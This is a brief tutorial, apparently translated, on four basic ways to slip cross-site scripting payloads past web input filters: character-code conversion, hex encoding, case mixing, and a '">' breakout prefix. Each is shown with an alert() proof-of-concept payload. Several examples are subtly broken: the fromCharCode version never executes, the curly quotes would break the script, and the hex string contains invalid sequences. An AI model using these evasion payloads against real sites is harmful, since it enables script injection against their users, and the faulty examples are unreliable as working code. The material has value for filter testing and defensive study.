Four very basic bypass methods.
1. Convert to ASCII codes
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41)</script>
2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3. Change the case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>
4. Prepend a closing marker ">
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: "><script>alert(‘I love F4ck’)</script>
For more detailed bypass techniques see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

The conversion tool used was the HackBar Mozilla add-on for Firefox.